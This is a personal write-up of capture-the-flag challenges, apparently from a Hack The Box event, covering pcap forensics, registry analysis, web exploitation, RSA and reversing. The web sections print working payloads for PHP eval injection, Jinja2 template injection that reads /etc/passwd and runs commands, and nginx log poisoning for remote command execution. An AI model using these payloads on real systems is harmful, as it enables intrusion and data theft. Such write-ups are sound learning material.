Challenge solved
Forensics
sneaky, top secret, Endurance ran , Phishin impossible
Web
Sim play, Potent Qoutes, Bone Chewer con, IMF landing
Crypto
weak RSA
reversing
Check
Misc
Blobber
Forensics
Sneaky
this challenge is easy and simple so going to the challenge description
after unzipping the file we got a pcap
analyzing the pcap we can see that theres an TCP and http so next thing we need to do is right click > follow > tcp stream
going to tcp stream 1 we can see that theres a login info with the password=not_an_easy_password_to_guess
on the challenge description it say that we need to get HTB{password} which is our flag so we do it HTB{not_an_easy_password_to_guess} and submit it as our flag
Top Secret
this give a pcap file only and upon analyzing it
we see an ftp so we go again with tcp stream follow
upon checking we found that theres a successful login and we can also see that he retrieve a pdf
upon moving on tcp stream 5 we can see that it has some PDF-1.5 which is i believe the raw data of the pdf files
since its in the ascii format what we need to do is show the data as raw since upon saving the file in ascii doesnt give as the flag
this is the pdf file and no flag inside as the flag format says it need to be in HTB{md5sum of the file}
so we use md5sum to the pdf and then we got our flag HTB{6ff7fa6c9aeee44c1aca5db8cf6278cb}
Endurance ran
upon downloading a file we see that it gave us a NTUSER.DAT file which is a part of registry hive on windows so googling about what tools we can use
i found the reglookup tool for analyzing a .DAT file
upon running it on our target we see bunch of stuffs so narrowing it down
we can use grep to find specific stuff i grep HTB which is a part of our flag and we got our flag but it still incomplete
upon analyzing it looks like obfuscated a little so we need to clean this up
after cleaning it we got this much better looking stuff
so next thing to do is putting up all the puzzle pieces and we can see that it uses powershell -c
since we eliminated all of stuffs that might be a part of flag we can put the other remaining parts into a flag format
PhishinImpossible
this time we got a pdf file
doing strings this give us an idea that it contains some Javascript and some file that we can extract
i tried using binwalk but doesnt give the file so we use pdfextract to get the files
we got some attached_secret 2 streamdumps and 1 js script
checking stream 5 and 8 this give a flag looking thing also it is the same with the attached_secret it does give us flag
next thing to do is we copy the <DeepLink> upto the </deeplink>
putting up the puzzle pieces we got our flag
Web
Sim Play
checking the file we got this stuffs
checking the website it only does give us a time so next thing to do is check the source code
after analyzing the other files i found this one interesting looks like an eval exploit
so googling about eval exploit we found this
https://infosecwriteups.com/when-i-found-php-code-injection-87e8e30afe59
trying the way for injecting command as what the article do we can see that it does do something with the output
so playing a round a bit with different command injection stuff this gave us 500 internal error with payload of the echo
after trying some stuffs i found this payload interesting the ${IFS} since its a special shell variable that splits the word after expansion we could try and inject stuffs after that such as ${IFS} ls and etc. but this did not give us anything
https://bash.cyberciti.biz/guide/$IFS
after a while of trying looks like we cant use ${IFS} so googling about stuffs we found this article pertaining to ${} and $()
https://superuser.com/questions/935374/difference-between-and-in-a-shell-script
https://linuxhint.com/use_expansions_shell_script/
so trying stuffs we can see that it does not execute our payload in $() but on ${} this gave us a blank output so probably we could still use this
so the next payload i tried is ${system(‘ls’)} and this gave us command execution
so going back one directory ew found the flag file and next thing to do is to read the flag file
Potent Quotes
the file they gave contains some databases so we could go directly to the website since the description says its a login panel so we might be needed to do some sql login bypass
so doing a simple way of sql injection bypass we got inside and got our flag
Bone Chewer Con
this challenge doesnt have any downloadable file so we go directly on the website
upon registering it does give us this
so trying stuffs we found that there is a xss i learned that from previous CTF that if it has some XSS its either you do a server side XSS to read internal files or do an SSTI
first i tried SSTI of jinja2 and we got a successful payload {{7*7}} = 49
so going to payload of all things we could try stuff of the payload
i used this payload to read internal files and we got a successful payload
{{get_flashed_messages.__globals__.__builtins__.open(“/etc/passwd”).read()}}
so next thing is reading the flag
SSTI command Execution
since i still got some free time i tried doing some SSTI command execution i found this payload and tried it
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen(‘id’).read() }}
we can see that we have a successful payload and we are user root also
since we got command execution we could do some ls and then cat the flag
{{+self._TemplateReference__context.namespace.__init__.__globals__.os.popen(‘cat+flag’).read()+}}
IMF Landing
this challenge doesnt have a downloadable file so we go to the website
so it does read the files of agents.php and home.php automatically if i see something like this i think of something like LFI
so we got an LFI but after while trying to read the flag it doesnt give us anything so we could go and do some LFI to RCE
going to payloadallthethings this give us an idea of log poisoning to get an RCE trough an LFI
we also identified that this webserver is an nginx
so we could try and read /var/log/nginx/access.log and we got a response
so after googling a while about log poisoning we found this article
for thins exploit to work we need to inject first this payload
<?php passthru($_GET[‘cmd’]); ?>
for us to get a command execution
next thing to do is to read the /var/log/nginx/access.log and add the cmd to get a command execution so our payload would go like this /var/log/nginx/access.log&cmd=id at first i thought it doesnt work but upon checking closely on the response we can see that on the bottom part we got www as our user
since we got a successful log poisoning we could try and execute commands and get our flag
as we can see the reason why we cant read the flag its because it has different file name
next thing to do is to read the flag and submit it. you can see the flag is in the bottom part
Crypto
crypto and its RSA also it gave us 2 files flag.enc and pubkey.pem
ofcourse since its RSA first thing that goes into my mind is RsaCTFtool honestly i can only do crypto if i can use RsaCTFtool :D
so running the tool give us our flag we just need ./RsaCtfTool.py — publickey <public key> — uncipherfile <file to decrypt>
Reversing
Check
when it comes to reversing i only us radare2 and ghidra for doing reverse challenges unfortunately im unable to solve the other reversing challenges
so going back we can see that it has main function also on radare2 to list all of the functions we can do afl to list them
upon checking closely we can see that the flag is in plain sight
HTB{ch3ck_anD_r3checK_ag1n}
Misc
Blobber
we got one file and its a js this challenge is all about deobfuscating
the flag contains string from char code
we can go to https://www.w3schools.com/jsref/jsref_fromcharcode.asp and put all of the values to deobfuscate it
after running it we found out that its a base64 we go to cyberchef and decode it
we can see that it has some PDF-1.6 kinda same with the forensics challenge so what we need to do is to save the output into a pdf
there are 2 ways to do this its either we use pdftotext to read the file or you just open it to get the flag
at the end of the competition i managed to get 91st place with 11/25 solves i think this is a good progress of how am i doing right now